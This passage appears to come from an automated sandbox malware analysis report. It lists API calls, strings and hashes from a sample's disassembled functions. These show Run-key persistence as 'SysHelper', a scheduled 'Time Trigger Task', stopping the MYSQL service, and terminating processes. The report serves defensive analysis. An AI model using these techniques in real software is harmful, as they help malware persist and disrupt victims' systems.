                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                            • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                            • API String ID: 2112994598-1672312481
                                                                                                                            • Opcode ID: 0883478c87ac41c32e294489a5c86d77272066cd3581e66e032ddbe11c846eed
                                                                                                                            • Instruction ID: 9a90c1c4c89192ff9af4f0c1d28608e269fd2c1c0969f9e988324550ea4b57ff
                                                                                                                            • Opcode Fuzzy Hash: 0883478c87ac41c32e294489a5c86d77272066cd3581e66e032ddbe11c846eed
                                                                                                                            • Instruction Fuzzy Hash: 5D31C971A401099BDB24EBBAEC46AAE77B8DF84724F2056A5FC1EF71D0EB309904C751
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E84AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F4,00E84C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00E8480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00E81D37,00000000,00E3CDAE,00000001,00000001), ref: 00E84AFA
                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00E84B05
                                                                                                                            • __vfwprintf_p.LIBCMT ref: 00E84B27
                                                                                                                              • Part of subcall function 00E5BDCC: _vfprintf_helper.LIBCMT ref: 00E5BDDF
                                                                                                                            • vswprintf.LIBCMT ref: 00E84B5D
                                                                                                                            • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00E84B7E
                                                                                                                            • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00E84BA2
                                                                                                                            • DeregisterEventSource.ADVAPI32(00000000), ref: 00E84BA9
                                                                                                                            • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00E84BD3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                            • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                            • API String ID: 277090408-1348657634
                                                                                                                            • Opcode ID: 870bd0cc01d267e2f43fe2d0660b4de305a8635dfe129735eda4bcc03c761cc1
                                                                                                                            • Instruction ID: 6483fad02b3cc7cedf08a2788a9282db1d14c258f3f5150d3d340a765918bc10
                                                                                                                            • Opcode Fuzzy Hash: 870bd0cc01d267e2f43fe2d0660b4de305a8635dfe129735eda4bcc03c761cc1
                                                                                                                            • Instruction Fuzzy Hash: C721B371648305AFE730A760CC47FFB77D8EF98701F544829B69DA61D0EAB494488753
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E42360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00E42389
                                                                                                                            • _memset.LIBCMT ref: 00E423B6
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 00E423DE
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00E423E7
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 00E423F4
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00E423FF
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4240E
                                                                                                                            • lstrcmpW.KERNEL32(?,?), ref: 00E42422
                                                                                                                            Strings
                                                                                                                            • SysHelper, xrefs: 00E423D6
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00E4237F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                            • API String ID: 122392481-4165002228
                                                                                                                            • Opcode ID: c82de3e090821f11cf55c0fe577acda8ddce92300248ea7ec1b91ff5908e8461
                                                                                                                            • Instruction ID: 8fefef06d4713282bd5ee8a86f97d2bb4bc8bdacdd41815d83a1ae6a25912440
                                                                                                                            • Opcode Fuzzy Hash: c82de3e090821f11cf55c0fe577acda8ddce92300248ea7ec1b91ff5908e8461
                                                                                                                            • Instruction Fuzzy Hash: D111477194020DAFDB10DBA0DC49FEE77BCBB08305F2045A5B609F2150DBB49A98DB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E55B6E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1077091919-0
                                                                                                                            • Opcode ID: 8a685f0ee87062b82db1bfc8fd2e25110a16c1db7d9125a9cbcdfe8031d7da3f
                                                                                                                            • Instruction ID: 2f5a3fcf52452b4bec28f234fed97cb1f815500f6b2ad85f4ba41b31b9ea7f0d
                                                                                                                            • Opcode Fuzzy Hash: 8a685f0ee87062b82db1bfc8fd2e25110a16c1db7d9125a9cbcdfe8031d7da3f
                                                                                                                            • Instruction Fuzzy Hash: 7F413773400708AFDB11AFA4DD56B9E77F1AF0432AF206C2AFD04B6192DB758648DB11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E48000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: 87233e2bed27b4b8e398b1348c0916f3db99eac88d2808067b81c4b9bb8b556e
                                                                                                                            • Instruction ID: d506536b5fd110c73c3213ab7cba07f96f24d3673704e4bb5df0cfb112dd09e3
                                                                                                                            • Opcode Fuzzy Hash: 87233e2bed27b4b8e398b1348c0916f3db99eac88d2808067b81c4b9bb8b556e
                                                                                                                            • Instruction Fuzzy Hash: 5AC19D71700209DFDB28CF08EA819AE77A6EF84704F24592AE891EB741DB70ED458B94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00E3DAEB
                                                                                                                            • CoCreateInstance.OLE32(00F04F6C,00000000,00000001,00F04F3C,?,?,00EFA948,000000FF), ref: 00E3DB0B
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00E3DBD6
                                                                                                                            • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,00EFA948,000000FF), ref: 00E3DBE3
                                                                                                                            • _memset.LIBCMT ref: 00E3DC38
                                                                                                                            • CoUninitialize.OLE32 ref: 00E3DC92
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                            • String ID: --Task$Comment$Time Trigger Task
                                                                                                                            • API String ID: 330603062-1376107329
                                                                                                                            • Opcode ID: 35a465b354023e49b71ad90018422910845311e214326e197db8af04c8d0b7dd
                                                                                                                            • Instruction ID: e266bf3d66e1974f4267a7bb28e87a08cf31e0f03440339970693147ebdea9a6
                                                                                                                            • Opcode Fuzzy Hash: 35a465b354023e49b71ad90018422910845311e214326e197db8af04c8d0b7dd
                                                                                                                            • Instruction Fuzzy Hash: BD51F9B0A4020AAFDB00DF94CC99FAE7BB9FF88705F104459F505AB290DB75A949CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E41A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00E41A1D
                                                                                                                            • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00E41A32
                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?), ref: 00E41A46
                                                                                                                            • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00E41A5B
                                                                                                                            • Sleep.KERNEL32(?), ref: 00E41A75
                                                                                                                            • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00E41A80
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00E41A9E
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00E41AA1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                            • String ID: MYSQL
                                                                                                                            • API String ID: 2359367111-1651825290
                                                                                                                            • Opcode ID: b3e0897e6f089297ed09c7409307f4dbac522d5935386fe6b9cbc48587098e66
                                                                                                                            • Instruction ID: 468dd62f9df24ed51069f724e23791236a6343d592074ae801a5af01764cb481
                                                                                                                            • Opcode Fuzzy Hash: b3e0897e6f089297ed09c7409307f4dbac522d5935386fe6b9cbc48587098e66
                                                                                                                            • Instruction Fuzzy Hash: 8111A331A01209AFDF209B95AD48FBF77ACDB84755F240050FA00F2140DB24DD8ADAA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E7F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::exception::exception.LIBCMT ref: 00E7F27F
                                                                                                                              • Part of subcall function 00E60CFC: std::exception::_Copy_str.LIBCMT ref: 00E60D15
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E7F294
                                                                                                                              • Part of subcall function 00E60ECA: RaiseException.KERNEL32(?,?,00E7F26B,?,?,00000000,?,?,?,?,00E7F26B,?,00F381FC,?), ref: 00E60F1F
                                                                                                                            • std::exception::exception.LIBCMT ref: 00E7F2AD
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E7F2C2
                                                                                                                            • std::regex_error::regex_error.LIBCPMT ref: 00E7F2D4
                                                                                                                              • Part of subcall function 00E7EF74: std::exception::exception.LIBCMT ref: 00E7EF8E
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E7F2E2
                                                                                                                            • std::exception::exception.LIBCMT ref: 00E7F2FB
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E7F310
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                            • String ID: bad function call
                                                                                                                            • API String ID: 2464034642-3612616537
                                                                                                                            • Opcode ID: e76b1703cce948ad533aedee0dd986032f7fe5c8f04ef4d2c3df0fb1068bef91
                                                                                                                            • Instruction ID: 1694034c9f6d356e05bda30122f013d946ec4e2c89bd94fd0c45ce9a2d923d95
                                                                                                                            • Opcode Fuzzy Hash: e76b1703cce948ad533aedee0dd986032f7fe5c8f04ef4d2c3df0fb1068bef91
                                                                                                                            • Instruction Fuzzy Hash: DD11EC74D4021DBBCF00FFA4D945CDEBBBCEA04384F409966BD24A7642EA75E3099B91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E53576 Relevance: 15.3, APIs: 10, Instructions: 258COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00E535B1
                                                                                                                              • Part of subcall function 00E55208: __getptd_noexit.LIBCMT ref: 00E55208
                                                                                                                            • __gmtime64_s.LIBCMT ref: 00E5364A
                                                                                                                            • __gmtime64_s.LIBCMT ref: 00E53680
                                                                                                                            • __gmtime64_s.LIBCMT ref: 00E5369D
                                                                                                                            • __allrem.LIBCMT ref: 00E536F3
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E5370F
                                                                                                                            • __allrem.LIBCMT ref: 00E53726
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E53744
                                                                                                                            • __allrem.LIBCMT ref: 00E5375B
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E53779
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1503770280-0
                                                                                                                            • Opcode ID: 37df39d3579e95a8e887addc41253b412796beb6f43eb533d1880f36d50fb082
                                                                                                                            • Instruction ID: b26209c376682a28e5a86f24fd26652d970e5fc2f7d000f1cf5f4194281ef858
                                                                                                                            • Opcode Fuzzy Hash: 37df39d3579e95a8e887addc41253b412796beb6f43eb533d1880f36d50fb082
                                                                                                                            • Instruction Fuzzy Hash: C2712AF2A00716ABD7149E79CC41B5AB3E4AF043A6F146A3AFD14F7681F770DA088790
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E95480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 00E954C8
                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 00E954D4
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 00E954F7
                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 00E95503
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00E95531
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 00E9555B
                                                                                                                            • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 00E955F5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                            • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                            • API String ID: 1717984340-2085858615
                                                                                                                            • Opcode ID: 4d4733c47f7ec155397d3694b663623a7281f5b741754fc0ff1258f6ea49f8ee
                                                                                                                            • Instruction ID: 870fa96241bef83c0f862ef74b73e81d643092b4bb45e4e1e573e9dff9abebb5
                                                                                                                            • Opcode Fuzzy Hash: 4d4733c47f7ec155397d3694b663623a7281f5b741754fc0ff1258f6ea49f8ee
                                                                                                                            • Instruction Fuzzy Hash: F4517B32B80704BBEF216BA09C03FBE77A9EF45711F114026FE05BB1D2DA618905C7A2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E42440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00E4244F
                                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E42469
                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E424A1
                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000009), ref: 00E424B0
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E424B7
